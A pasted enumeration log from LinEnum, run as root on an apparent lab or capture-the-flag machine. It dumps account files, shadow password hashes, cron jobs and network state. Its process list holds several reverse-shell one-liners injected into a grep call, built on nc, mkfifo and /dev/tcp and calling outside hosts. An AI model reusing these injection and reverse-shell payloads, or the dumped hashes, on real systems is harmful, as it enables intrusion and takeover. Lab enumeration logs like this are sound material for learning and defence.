Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #########################################################
- # Local Linux Enumeration & Privilege Escalation Script #
- #########################################################
- # www.rebootuser.com
- # version 0.94
- [-] Debug Info
- [+] Thorough tests = Disabled (SUID/GUID checks will not be perfomed!)
- Scan started at:
- Mon Jan 7 23:08:38 UTC 2019
- ### SYSTEM ##############################################
- [-] Kernel information:
- Linux r1 4.15.0-24-generic #26-Ubuntu SMP Wed Jun 13 08:44:47 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
- [-] Kernel information (continued):
- Linux version 4.15.0-24-generic (buildd@lgw01-amd64-056) (gcc version 7.3.0 (Ubuntu 7.3.0-16ubuntu3)) #26-Ubuntu SMP Wed Jun 13 08:44:47 UTC 2018
- [-] Specific release information:
- DISTRIB_ID=Ubuntu
- DISTRIB_RELEASE=16.04
- DISTRIB_CODENAME=xenial
- DISTRIB_DESCRIPTION="Ubuntu 16.04.4 LTS"
- NAME="Ubuntu"
- VERSION="16.04.4 LTS (Xenial Xerus)"
- ID=ubuntu
- ID_LIKE=debian
- PRETTY_NAME="Ubuntu 16.04.4 LTS"
- VERSION_ID="16.04"
- HOME_URL="http://www.ubuntu.com/"
- SUPPORT_URL="http://help.ubuntu.com/"
- BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
- VERSION_CODENAME=xenial
- UBUNTU_CODENAME=xenial
- [-] Hostname:
- r1
- ### USER/GROUP ##########################################
- [-] Current user/group info:
- uid=0(root) gid=0(root) groups=0(root)
- [-] Who else is logged on:
- 23:08:38 up 2:24, 0 users, load average: 2.80, 3.93, 3.06
- USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
- [-] Group memberships:
- uid=0(root) gid=0(root) groups=0(root)
- uid=1(daemon) gid=1(daemon) groups=1(daemon)
- uid=2(bin) gid=2(bin) groups=2(bin)
- uid=3(sys) gid=3(sys) groups=3(sys)
- uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
- uid=5(games) gid=60(games) groups=60(games)
- uid=6(man) gid=12(man) groups=12(man)
- uid=7(lp) gid=7(lp) groups=7(lp)
- uid=8(mail) gid=8(mail) groups=8(mail)
- uid=9(news) gid=9(news) groups=9(news)
- uid=10(uucp) gid=10(uucp) groups=10(uucp)
- uid=13(proxy) gid=13(proxy) groups=13(proxy)
- uid=33(www-data) gid=33(www-data) groups=33(www-data)
- uid=34(backup) gid=34(backup) groups=34(backup)
- uid=38(list) gid=38(list) groups=38(list)
- uid=39(irc) gid=39(irc) groups=39(irc)
- uid=41(gnats) gid=41(gnats) groups=41(gnats)
- uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
- uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
- uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
- uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
- uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
- uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
- uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
- uid=106(lxd) gid=65534(nogroup) groups=65534(nogroup)
- uid=107(messagebus) gid=111(messagebus) groups=111(messagebus)
- uid=108(uuidd) gid=112(uuidd) groups=112(uuidd)
- uid=109(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
- uid=110(sshd) gid=65534(nogroup) groups=65534(nogroup)
- uid=111(pollinate) gid=1(daemon) groups=1(daemon)
- uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),110(lxd)
- uid=112(quagga) gid=117(quagga) groups=117(quagga)
- [-] It looks like we have some admin users:
- uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
- uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),110(lxd)
- [-] Contents of /etc/passwd:
- root:x:0:0:root:/root:/bin/bash
- daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
- bin:x:2:2:bin:/bin:/usr/sbin/nologin
- sys:x:3:3:sys:/dev:/usr/sbin/nologin
- sync:x:4:65534:sync:/bin:/bin/sync
- games:x:5:60:games:/usr/games:/usr/sbin/nologin
- man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
- lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
- mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
- news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
- uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
- proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
- www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
- backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
- list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
- irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
- gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
- nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
- systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
- systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
- systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
- systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
- syslog:x:104:108::/home/syslog:/bin/false
- _apt:x:105:65534::/nonexistent:/bin/false
- lxd:x:106:65534::/var/lib/lxd/:/bin/false
- messagebus:x:107:111::/var/run/dbus:/bin/false
- uuidd:x:108:112::/run/uuidd:/bin/false
- dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
- sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
- pollinate:x:111:1::/var/cache/pollinate:/bin/false
- ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
- quagga:x:112:117:Quagga routing suite,,,:/var/run/quagga/:/bin/false
- [+] We can read the shadow file!
- root:$6$39RGMx6s$l.2O2Uc8z73bzQ.JpJxXCVvOVnHdjPebC511IIeN.tX6l/PEUDB3bhvChSS2zuy8zVOtkSy2VNJ1Bf75.Qr4t1:17903:0:99999:7:::
- daemon:*:17704:0:99999:7:::
- bin:*:17704:0:99999:7:::
- sys:*:17704:0:99999:7:::
- sync:*:17704:0:99999:7:::
- games:*:17704:0:99999:7:::
- man:*:17704:0:99999:7:::
- lp:*:17704:0:99999:7:::
- mail:*:17704:0:99999:7:::
- news:*:17704:0:99999:7:::
- uucp:*:17704:0:99999:7:::
- proxy:*:17704:0:99999:7:::
- www-data:*:17704:0:99999:7:::
- backup:*:17704:0:99999:7:::
- list:*:17704:0:99999:7:::
- irc:*:17704:0:99999:7:::
- gnats:*:17704:0:99999:7:::
- nobody:*:17704:0:99999:7:::
- systemd-timesync:*:17704:0:99999:7:::
- systemd-network:*:17704:0:99999:7:::
- systemd-resolve:*:17704:0:99999:7:::
- systemd-bus-proxy:*:17704:0:99999:7:::
- syslog:*:17704:0:99999:7:::
- _apt:*:17704:0:99999:7:::
- lxd:*:17704:0:99999:7:::
- messagebus:*:17704:0:99999:7:::
- uuidd:*:17704:0:99999:7:::
- dnsmasq:*:17704:0:99999:7:::
- sshd:*:17704:0:99999:7:::
- pollinate:*:17704:0:99999:7:::
- ubuntu:$6$mUl1xHIc$imY3ECxHews2PTpfqK0WQ5SK58eKMPSFEjJy8StuWIEiOCBsg1N/NsrYxwSK8lLKyhH3c.nU4rcs9wI3RNkd71:17903:0:99999:7:::
- quagga:*:17713:0:99999:7:::
- [-] Super user account(s):
- root
- [-] Sudoers configuration (condensed):Defaults env_reset
- Defaults mail_badpass
- Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
- root ALL=(ALL:ALL) ALL
- %admin ALL=(ALL) ALL
- %sudo ALL=(ALL:ALL) ALL
- [+] We can sudo without supplying a password!
- Matching Defaults entries for root on r1:
- env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
- User root may run the following commands on r1:
- (ALL : ALL) ALL
- [+] We can read root's home directory!
- total 84K
- drwx------ 1 root root 226 Jan 7 23:06 .
- drwxr-xr-x 1 root root 140 Jun 22 2018 ..
- -rw-r--r-- 1 root root 3.1K Jul 2 2018 .bashrc
- drwx------ 1 root root 40 Jul 2 2018 .cache
- -rwxr-xr-x 1 root root 45K Jan 5 21:28 LinEnum.sh
- drwxr-xr-x 1 root root 0 Jul 2 2018 .nano
- -rw-r--r-- 1 root root 7.1K Jan 7 23:08 output.txt
- prw-r--r-- 1 root root 0 Jan 7 20:57 pipe
- -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
- -rw-r--r-- 1 root root 66 Jul 2 2018 .selected_editor
- -rwxr-xr-x 1 root root 66 Jan 7 22:52 shell.sh
- drwx------ 1 root root 84 Jan 7 20:55 .ssh
- -rw-r--r-- 1 root root 0 Jul 3 2018 test_intercept.pcap
- -rw-r--r-- 1 root root 33 Jul 2 2018 user.txt
- -rw------- 1 root root 5.0K Jul 3 2018 .viminfo
- [-] Are permissions on /home directories lax:
- total 0
- drwxr-xr-x 1 root root 12 Jul 1 2018 .
- drwxr-xr-x 1 root root 140 Jun 22 2018 ..
- drwxr-xr-x 1 ubuntu ubuntu 62 Jul 1 2018 ubuntu
- ### ENVIRONMENTAL #######################################
- [-] Environment information:
- XDG_SESSION_ID=317
- SHELL=/bin/bash
- SSH_CLIENT=10.99.64.251 48274 22
- USER=root
- PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
- MAIL=/var/mail/root
- PWD=/root
- LANG=en_US.UTF-8
- HOME=/root
- SHLVL=5
- LOGNAME=root
- SSH_CONNECTION=10.99.64.251 48274 10.99.64.2 22
- VTYSH_PAGER=more
- VIMRUNTIME=/usr/share/vim/vim74
- XDG_RUNTIME_DIR=/run/user/0
- VIM=/usr/share/vim
- _=/usr/bin/env
- [-] Path information:
- /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
- [-] Available shells:
- # /etc/shells: valid login shells
- /bin/sh
- /bin/dash
- /bin/bash
- /bin/rbash
- /usr/bin/tmux
- /usr/bin/screen
- [-] Current umask value:
- 0022
- u=rwx,g=rx,o=rx
- [-] umask value as specified in /etc/login.defs:
- UMASK 022
- [-] Password and storage information:
- PASS_MAX_DAYS 99999
- PASS_MIN_DAYS 0
- PASS_WARN_AGE 7
- ENCRYPT_METHOD SHA512
- ### JOBS/TASKS ##########################################
- [-] Cron jobs:
- -rw-r--r-- 1 root root 722 Apr 5 2016 /etc/crontab
- /etc/cron.d:
- total 12
- drwxr-xr-x 1 root root 70 Jun 22 2018 .
- drwxr-xr-x 1 root root 2988 Jan 7 21:14 ..
- -rw-r--r-- 1 root root 589 Jul 16 2014 mdadm
- -rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
- -rw-r--r-- 1 root root 190 Jun 22 2018 popularity-contest
- /etc/cron.daily:
- total 48
- drwxr-xr-x 1 root root 234 Jul 1 2018 .
- drwxr-xr-x 1 root root 2988 Jan 7 21:14 ..
- -rwxr-xr-x 1 root root 376 Mar 31 2016 apport
- -rwxr-xr-x 1 root root 1474 Mar 6 2018 apt-compat
- -rwxr-xr-x 1 root root 355 May 22 2012 bsdmainutils
- -rwxr-xr-x 1 root root 1597 Nov 26 2015 dpkg
- -rwxr-xr-x 1 root root 372 May 6 2015 logrotate
- -rwxr-xr-x 1 root root 1293 Nov 6 2015 man-db
- -rwxr-xr-x 1 root root 539 Jul 16 2014 mdadm
- -rwxr-xr-x 1 root root 435 Nov 18 2014 mlocate
- -rwxr-xr-x 1 root root 249 Nov 12 2015 passwd
- -rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
- -rwxr-xr-x 1 root root 3449 Feb 26 2016 popularity-contest
- -rwxr-xr-x 1 root root 214 May 24 2016 update-notifier-common
- /etc/cron.hourly:
- total 4
- drwxr-xr-x 1 root root 24 Jun 22 2018 .
- drwxr-xr-x 1 root root 2988 Jan 7 21:14 ..
- -rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
- /etc/cron.monthly:
- total 4
- drwxr-xr-x 1 root root 24 Jun 22 2018 .
- drwxr-xr-x 1 root root 2988 Jan 7 21:14 ..
- -rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
- /etc/cron.weekly:
- total 16
- drwxr-xr-x 1 root root 92 Jul 1 2018 .
- drwxr-xr-x 1 root root 2988 Jan 7 21:14 ..
- -rwxr-xr-x 1 root root 86 Apr 13 2016 fstrim
- -rwxr-xr-x 1 root root 771 Nov 6 2015 man-db
- -rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
- -rwxr-xr-x 1 root root 211 May 24 2016 update-notifier-common
- [-] Crontab contents:
- # /etc/crontab: system-wide crontab
- # Unlike any other crontab you don't have to run the `crontab'
- # command to install the new version when you edit this file
- # and files in /etc/cron.d. These files also have username fields,
- # that none of the other crontabs do.
- SHELL=/bin/sh
- PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
- # m h dom mon dow user command
- 17 * * * * root cd / && run-parts --report /etc/cron.hourly
- 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
- 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
- 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
- #
- [-] Anything interesting in /var/spool/cron/crontabs:
- total 4
- drwx-wx--T 1 root crontab 8 Jan 7 22:07 .
- drwxr-xr-x 1 root root 42 Jun 22 2018 ..
- -rw------- 1 root crontab 1118 Jul 2 2018 root
- [-] Jobs held by all users:
- # Edit this file to introduce tasks to be run by cron.
- #
- # Each task to run has to be defined through a single line
- # indicating with different fields when the task will be run
- # and what command to run for the task
- #
- # To define the time you can provide concrete values for
- # minute (m), hour (h), day of month (dom), month (mon),
- # and day of week (dow) or use '*' in these fields (for 'any').#
- # Notice that tasks will be started based on the cron's system
- # daemon's notion of time and timezones.
- #
- # Output of the crontab jobs (including errors) is sent through
- # email to the user the crontab file belongs to (unless redirected).
- #
- # For example, you can run a backup of all your user accounts
- # at 5 a.m every week with:
- # 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
- #
- # For more information see the manual pages of crontab(5) and cron(8)
- #
- # m h dom mon dow command
- */10 * * * * /opt/restore.sh
- [-] Systemd timers:
- NEXT LEFT LAST PASSED UNIT ACTIVATES
- Tue 2019-01-08 06:46:32 UTC 7h left Mon 2019-01-07 20:44:05 UTC 2h 24min ago apt-daily-upgrade.timer apt-daily-upgrade.service
- Tue 2019-01-08 17:44:13 UTC 18h left Mon 2019-01-07 20:44:05 UTC 2h 24min ago apt-daily.timer apt-daily.service
- Tue 2019-01-08 20:58:58 UTC 21h left Mon 2019-01-07 20:58:58 UTC 2h 9min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
- 3 timers listed.
- Enable thorough tests to see inactive timers
- ### NETWORKING ##########################################
- [-] Network and IP info:
- eth0 Link encap:Ethernet HWaddr 00:16:3e:d9:04:ea
- inet addr:10.99.64.2 Bcast:10.99.64.255 Mask:255.255.255.0
- inet6 addr: fe80::216:3eff:fed9:4ea/64 Scope:Link
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- RX packets:16929 errors:0 dropped:0 overruns:0 frame:0
- TX packets:13670 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:1000
- RX bytes:7577356 (7.5 MB) TX bytes:23523353 (23.5 MB)
- eth1 Link encap:Ethernet HWaddr 00:16:3e:8a:f2:4f
- inet addr:10.78.10.1 Bcast:10.78.10.255 Mask:255.255.255.0
- inet6 addr: fe80::216:3eff:fe8a:f24f/64 Scope:Link
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- RX packets:1001 errors:0 dropped:0 overruns:0 frame:0
- TX packets:931 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:1000
- RX bytes:71758 (71.7 KB) TX bytes:63054 (63.0 KB)
- eth2 Link encap:Ethernet HWaddr 00:16:3e:20:98:df
- inet addr:10.78.11.1 Bcast:10.78.11.255 Mask:255.255.255.0
- inet6 addr: fe80::216:3eff:fe20:98df/64 Scope:Link
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- RX packets:707 errors:0 dropped:0 overruns:0 frame:0
- TX packets:2811 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:1000
- RX bytes:49606 (49.6 KB) TX bytes:155949 (155.9 KB)
- lo Link encap:Local Loopback
- inet addr:127.0.0.1 Mask:255.0.0.0
- inet6 addr: ::1/128 Scope:Host
- UP LOOPBACK RUNNING MTU:65536 Metric:1
- RX packets:24489 errors:0 dropped:0 overruns:0 frame:0
- TX packets:24489 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:1000
- RX bytes:1085180 (1.0 MB) TX bytes:1085180 (1.0 MB)
- lo:0 Link encap:Local Loopback
- inet addr:10.120.15.10 Mask:255.255.255.128
- UP LOOPBACK RUNNING MTU:65536 Metric:1
- [-] ARP history:
- ? (10.78.11.2) at 00:16:3e:c4:fa:83 [ether] on eth2
- ? (10.78.10.2) at 00:16:3e:5b:49:a9 [ether] on eth1
- ? (10.99.64.251) at 00:16:3e:f3:92:14 [ether] on eth0
- ? (10.99.64.1) at fe:0d:18:88:55:67 [ether] on eth0
- [-] Default route:
- default 10.99.64.1 0.0.0.0 UG 0 0 0 eth0
- [-] Listening TCP:
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
- tcp 0 0 127.0.0.1:2601 0.0.0.0:* LISTEN 6824/zebra
- tcp 0 0 127.0.0.1:2605 0.0.0.0:* LISTEN 6828/bgpd
- tcp 0 0 0.0.0.0:179 0.0.0.0:* LISTEN 6828/bgpd
- tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 3455/sshd
- tcp 0 0 10.99.64.2:22 10.99.64.251:46856 ESTABLISHED 1085/sshd: root@not
- tcp 0 0 10.99.64.2:22 10.99.64.251:47954 ESTABLISHED 5394/sshd: root@not
- tcp 0 0 10.78.11.1:179 10.78.11.2:35148 ESTABLISHED 6828/bgpd
- tcp 0 0 10.99.64.2:22 10.99.64.251:47500 ESTABLISHED 4144/sshd: root@not
- tcp 0 0 10.99.64.2:22 10.99.64.251:47966 ESTABLISHED 5433/sshd: root@not
- tcp 0 0 10.78.10.1:54166 10.78.10.2:179 ESTABLISHED 6828/bgpd
- tcp 0 0 10.99.64.2:22 10.99.64.251:46974 ESTABLISHED 2262/sshd: root@not
- tcp 0 0 10.99.64.2:55940 10.10.12.58:2222 ESTABLISHED 3953/bash
- tcp 0 0 10.99.64.2:22 10.99.64.251:48054 ESTABLISHED 5908/sshd: root@not
- tcp 0 0 10.99.64.2:22 10.99.64.251:48020 ESTABLISHED 5689/sshd: root@not
- tcp 0 0 10.99.64.2:22 10.99.64.251:48130 ESTABLISHED 6216/sshd: root@not
- tcp 0 0 10.99.64.2:22 10.99.64.251:47806 ESTABLISHED 4451/sshd: root@not
- tcp 0 0 10.99.64.2:50394 10.10.15.100:1234 ESTABLISHED 5284/nc
- tcp 0 0 10.99.64.2:22 10.99.64.251:47930 ESTABLISHED 5247/sshd: root@not
- tcp 0 0 10.99.64.2:37500 10.10.15.171:1002 ESTABLISHED 6533/nc
- tcp 0 0 10.99.64.2:22 10.99.64.251:48092 ESTABLISHED 6064/sshd: root@not
- tcp 0 0 10.99.64.2:53512 10.10.13.63:1234 ESTABLISHED 1252/nc
- tcp 0 0 10.99.64.2:22 10.99.64.251:46868 ESTABLISHED 1218/sshd: root@not
- tcp 0 0 10.99.64.2:22 10.99.64.251:46882 ESTABLISHED 1441/sshd: root@not
- tcp 0 0 10.99.64.2:22 10.99.64.251:47934 ESTABLISHED 5299/sshd: root@not
- tcp 0 0 10.99.64.2:22 10.99.64.251:48028 ESTABLISHED 5728/sshd: root@not
- tcp 0 0 10.99.64.2:22 10.99.64.251:48244 ESTABLISHED 6709/sshd: root@not
- tcp 0 0 10.99.64.2:22 10.99.64.251:48046 ESTABLISHED 5869/sshd: root@not
- tcp 0 0 10.99.64.2:22 10.99.64.251:48206 ESTABLISHED 6540/sshd: root@not
- tcp 0 0 10.99.64.2:45760 10.10.14.30:9998 ESTABLISHED 2295/bash
- tcp 0 0 10.99.64.2:22 10.99.64.251:48188 ESTABLISHED 6451/sshd: root@not
- tcp 0 0 10.99.64.2:22 10.99.64.251:46860 ESTABLISHED 1130/sshd: root@not
- tcp 0 0 10.99.64.2:22 10.99.64.251:48128 ESTABLISHED 6177/sshd: root@not
- tcp 0 0 10.99.64.2:22 10.99.64.251:48274 ESTABLISHED 7141/sshd: root@not
- tcp 0 0 10.99.64.2:22 10.99.64.251:48196 ESTABLISHED 6496/sshd: root@not
- tcp 0 0 10.99.64.2:22 10.99.64.251:48004 ESTABLISHED 5647/sshd: root@not
- tcp 0 0 10.99.64.2:22 10.99.64.251:47818 ESTABLISHED 4495/sshd: root@not
- tcp 0 0 10.99.64.2:47334 10.10.15.171:1001 ESTABLISHED 6752/nc
- tcp 0 0 10.99.64.2:46894 10.10.15.171:1001 ESTABLISHED 4488/nc
- tcp 0 0 10.99.64.2:22 10.99.64.251:48056 ESTABLISHED 5947/sshd: root@not
- tcp 0 0 10.99.64.2:22 10.99.64.251:47920 ESTABLISHED 5171/sshd: root@not
- tcp 0 0 10.99.64.2:22 10.99.64.251:47950 ESTABLISHED 5354/sshd: root@not
- tcp 0 0 10.99.64.2:46906 10.10.15.171:1001 ESTABLISHED 4532/nc
- tcp 0 0 10.99.64.2:22 10.99.64.251:48170 ESTABLISHED 6334/sshd: root@not
- tcp 0 0 10.99.64.2:22 10.99.64.251:47188 ESTABLISHED 3622/sshd: root@not
- tcp 0 0 10.99.64.2:22 10.99.64.251:48146 ESTABLISHED 6258/sshd: root@not
- tcp 0 0 10.99.64.2:42080 10.10.15.233:8765 ESTABLISHED 7174/bash
- tcp 0 0 10.99.64.2:22 10.99.64.251:47784 ESTABLISHED 4302/sshd: root@not
- tcp 0 0 10.99.64.2:22 10.99.64.251:47246 ESTABLISHED 3918/sshd: root@not
- tcp6 0 0 :::179 :::* LISTEN 6828/bgpd
- tcp6 0 0 :::22 :::* LISTEN 3455/sshd
- [-] Listening UDP:
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
- udp 1408 0 10.99.64.2:35127 10.10.15.233:9000 ESTABLISHED 5984/nc
- udp 0 0 10.99.64.2:41287 10.10.15.233:9000 ESTABLISHED 5945/nc
- udp 0 0 10.99.64.2:55664 10.10.15.233:9000 ESTABLISHED 6214/nc
- ### SERVICES #############################################
- [-] Running processes:
- USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
- root 1 0.0 0.2 45836 5752 ? Ss 20:43 0:02 /sbin/init
- root 51 0.0 0.2 35272 4652 ? Ss 20:43 0:00 /lib/systemd/systemd-journald
- root 66 0.0 0.1 41720 3072 ? Ss 20:43 0:00 /lib/systemd/systemd-udevd
- message+ 475 0.0 0.1 42896 3464 ? Ss 20:44 0:01 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
- root 479 0.0 0.2 274488 5660 ? Ssl 20:44 0:00 /usr/lib/accountsservice/accounts-daemon
- root 480 0.0 0.1 27728 2536 ? Ss 20:44 0:00 /usr/sbin/cron -f
- root 481 0.0 0.1 28544 2916 ? Ss 20:44 0:00 /lib/systemd/systemd-logind
- root 484 0.0 1.1 216564 22920 ? Ssl 20:44 0:00 /usr/lib/snapd/snapd
- daemon 485 0.0 0.0 26044 1968 ? Ss 20:44 0:00 /usr/sbin/atd -f
- root 488 0.0 0.0 5220 112 ? Ss 20:44 0:00 /sbin/iscsid
- root 489 0.0 0.1 5720 3536 ? SLs 20:44 0:01 /sbin/iscsid
- root 507 0.0 0.2 277176 5684 ? Ssl 20:44 0:00 /usr/lib/policykit-1/polkitd --no-debug
- root 521 0.0 0.0 14472 1616 console Ss+ 20:44 0:00 /sbin/agetty --noclear --keep-baud console 115200 38400 9600 linux
- root 774 0.0 0.2 36684 4516 ? Ss 20:46 0:00 /lib/systemd/systemd --user
- root 775 0.0 0.0 60884 1544 ? S 20:46 0:00 (sd-pam)
- root 1085 0.0 0.1 92796 2568 ? Ss 20:49 0:00 sshd: root@notty
- root 1115 0.0 0.0 11236 1676 ? Ss 20:49 0:00 bash -c ps waux | grep |rm /tmp/f;mkfifo /tmp/f;ci?x!t /tmp/f|/bin/sh -i 2>&1|nc 10.10.13.69 9988 >/tmp/f | grep -v grep
- root 1122 0.0 0.0 11236 196 ? S 20:49 0:00 bash -c ps waux | grep |rm /tmp/f;mkfifo /tmp/f;ci?x!t /tmp/f|/bin/sh -i 2>&1|nc 10.10.13.69 9988 >/tmp/f | grep -v grep
- root 1123 0.0 0.0 12944 444 ? S 20:49 0:00 grep -v grep
- root 1130 0.0 0.1 92796 2548 ? Ss 20:49 0:00 sshd: root@notty
- root 1160 0.0 0.0 11236 1600 ? Ss 20:49 0:00 bash -c ps waux | grep |rm /tmp/f;mkfifo /tmp/f;ci?x!t /tmp/f|/bin/sh -i 2>&1|nc 10.10.13.69 9988 >/tmp/f | grep -v grep
- root 1167 0.0 0.0 11236 196 ? S 20:49 0:00 bash -c ps waux | grep |rm /tmp/f;mkfifo /tmp/f;ci?x!t /tmp/f|/bin/sh -i 2>&1|nc 10.10.13.69 9988 >/tmp/f | grep -v grep
- root 1168 0.0 0.0 12944 452 ? S 20:49 0:00 grep -v grep
- root 1218 0.0 0.1 92796 2692 ? Ss 20:50 0:00 sshd: root@notty
- root 1248 0.0 0.0 11232 1732 ? Ss 20:50 0:00 bash -c ps waux | grep ; mkfifo pipe; nc -nv 10.10.13.63 1234 < pipe | /bin/sh 2>pipe >pipe | grep -v grep
- root 1252 0.0 0.0 11300 1708 ? S 20:50 0:00 nc -nv 10.10.13.63 1234
- root 1253 0.0 0.0 4504 792 ? S 20:50 0:00 /bin/sh
- root 1255 0.0 0.1 19896 2076 ? S 20:50 0:00 /bin/bash -i
- root 1441 0.0 0.1 92796 2500 ? Ss 20:51 0:00 sshd: root@notty
- root 1471 0.0 0.0 11236 1680 ? Ss 20:51 0:00 bash -c ps waux | grep |rm /tmp/f;mkfifo /tmp/f;ci?x!t /tmp/f|/bin/sh -i 2>&1|nc 10.10.13.69 9988 >/tmp/f | grep -v grep
- root 1478 0.0 0.0 11236 196 ? S 20:51 0:00 bash -c ps waux | grep |rm /tmp/f;mkfifo /tmp/f;ci?x!t /tmp/f|/bin/sh -i 2>&1|nc 10.10.13.69 9988 >/tmp/f | grep -v grep
- root 1479 0.0 0.0 12944 332 ? S 20:51 0:00 grep -v grep
- root 2262 0.0 0.1 92796 2648 ? Ss 20:57 0:00 sshd: root@notty
- root 2292 0.0 0.0 11232 1840 ? Ss 20:58 0:00 bash -c ps waux | grep ;bash -i >& /dev/tcp/10.10.14.30/9998 0>&1 | grep -v grep
- root 2295 0.0 0.1 19896 2136 ? S 20:58 0:00 bash -i
- root 3455 0.0 0.2 65508 4060 ? Ss 21:14 0:00 /usr/sbin/sshd -D
- root 3622 0.0 0.1 92796 3864 ? Ss 21:23 0:00 sshd: root@notty
- root 3652 0.0 0.1 11232 2192 ? Ss 21:23 0:00 bash -c ps waux | grep ; tcpdump -i lo:0 -vv | grep -v grep
- root 3655 0.0 0.3 24800 6352 ? S 21:23 0:00 tcpdump -i lo:0 -vv
- root 3656 0.0 0.0 12944 984 ? S 21:23 0:00 grep -v grep
- root 3918 0.0 0.3 92796 6632 ? Ss 21:32 0:00 sshd: root@notty
- root 3948 0.0 0.1 11232 2116 ? Ss 21:32 0:00 bash -c ps waux | grep root$(bash -i >& /dev/tcp/10.10.12.58/2222 0>&1) | grep -v grep
- root 3950 0.0 0.0 11232 192 ? S 21:32 0:00 bash -c ps waux | grep root$(bash -i >& /dev/tcp/10.10.12.58/2222 0>&1) | grep -v grep
- root 3951 0.0 0.0 12944 972 ? S 21:32 0:00 grep -v grep
- root 3952 0.0 0.0 11232 1216 ? S 21:32 0:00 bash -c ps waux | grep root$(bash -i >& /dev/tcp/10.10.12.58/2222 0>&1) | grep -v grep
- root 3953 0.0 0.1 19896 2864 ? S 21:32 0:00 bash -i
- root 4144 0.0 0.3 92796 6844 ? Ss 21:50 0:00 sshd: root@notty
- root 4174 0.0 0.1 11236 2184 ? Ss 21:50 0:00 bash -c ps waux | grep root; ls; rm /tmp/zz;mkfifo /tmp/zz;cat /tmp/zz|/bin/sh -i 2>&1|netcat 10.10.15.171 1000 ???\?ޞ????ܙ\??]??ܙ\? | grep -v grep
- root 4180 0.0 0.0 6028 676 ? S 21:50 0:00 cat /tmp/zz
- root 4181 0.0 0.0 4504 796 ? S 21:50 0:00 /bin/sh -i
- root 4302 0.0 0.3 92796 6680 ? Ss 21:59 0:00 sshd: root@notty
